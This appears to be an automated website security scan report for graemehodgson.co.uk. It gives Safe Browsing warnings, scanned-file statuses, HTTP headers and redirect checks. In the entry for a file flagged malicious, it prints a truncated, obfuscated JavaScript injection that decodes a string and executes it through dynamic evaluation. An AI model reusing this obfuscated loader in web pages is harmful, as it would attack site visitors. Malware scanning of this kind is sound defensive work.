Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=graemehodgson.co.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://graemehodgson.co.uk/ | 200 OK Content-Length: 7103 Content-Type: text/html | clean |
http://graemehodgson.co.uk/index.html | 200 OK Content-Length: 7103 Content-Type: text/html | clean |
http://graemehodgson.co.uk/test404page.js | 404 Not Found Content-Length: 5448 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="renceErr";el.appendChild(document.createTextNode("q"));el.insertBefore(document.createTextNode("l"),el.childNodes[1]);el2=el.removeChild(el.childNodes[1]);try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.firstChild.nodeValue+a.toString().substr(0,0);};ar=".meafbt(,)dhy][}C\"0B:1sozpvNAn2<TcEi>? r{=l '/guw;";ar2="R152c0c-12c-124c156c-144c12c52c40c56c-184c4c108c-92c-24c184c-176c16c112c32c-160c-4c4c108c-92c64c-12c-28c80c-116c172c-76c-96c-8c4c20c1 e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="152";s="";pos=0;i=0;while(i<555){e('po'+'s+=par'+'seInt(k'+'.rep'+'lace("'+'ren'+'","0a'+'sd"))+'+'ar2['+'i]/'+'4');e('s+=ar.su'+''+'bstr(pos,1)');i++;} e(s); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: graemehodgson.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Oct 2014 02:45:29 GMT
Accept-Ranges: bytes
ETag: "9c608c-1bbf-4d0d72c61de00"
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch
Vary: Accept-Encoding
Content-Length: 7103
Content-Type: text/html
Last-Modified: Fri, 14 Dec 2012 22:01:28 GMT
...7103 bytes of data.
GET / HTTP/1.1
Host: graemehodgson.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Oct 2014 02:45:29 GMT
Accept-Ranges: bytes
ETag: "9c608c-1bbf-4d0d72c61de00"
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch
Vary: Accept-Encoding
Content-Length: 7103
Content-Type: text/html
Last-Modified: Fri, 14 Dec 2012 22:01:28 GMT
...7103 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: graemehodgson.co.uk
Referer: http://www.google.com/search?q=graemehodgson.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: graemehodgson.co.uk
Referer: http://www.google.com/search?q=graemehodgson.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.